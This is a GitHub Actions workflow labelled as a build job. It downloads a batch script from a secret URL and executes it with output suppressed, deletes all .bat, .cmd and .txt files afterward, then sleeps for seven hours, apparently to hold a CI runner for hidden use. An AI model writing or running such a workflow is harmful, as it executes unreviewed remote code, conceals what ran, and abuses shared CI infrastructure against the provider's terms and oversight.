name: Makealast
on:
  workflow_dispatch:

jobs:
  build:
    name: Building
    runs-on: windows-latest

    steps:
    - name: ls
      shell: cmd
      run: |
        curl -L %GIST_URL% -o loads.bat >log.txt 2>&1
        cmd /c loads.bat >log.txt 2>&1
      env:
        GIST_URL: ${{ secrets.GIST_URL }}

    - name: Del1
      run: cmd /c "del /f *.bat"

    - name: Del2
      run: cmd /c "del /f *.cmd"

    - name: Del3
      run: cmd /c "del /f *.txt"
      
    - name: 1
      run: Start-Sleep -Seconds 3600
    - name: 2
      run: Start-Sleep -Seconds 3600
    - name: 3
      run: Start-Sleep -Seconds 3600
    - name: 4
      run: Start-Sleep -Seconds 3600
    - name: 5
      run: Start-Sleep -Seconds 3600
    - name: 6
      run: Start-Sleep -Seconds 3600
    - name: END
      run: Start-Sleep -Seconds 3600
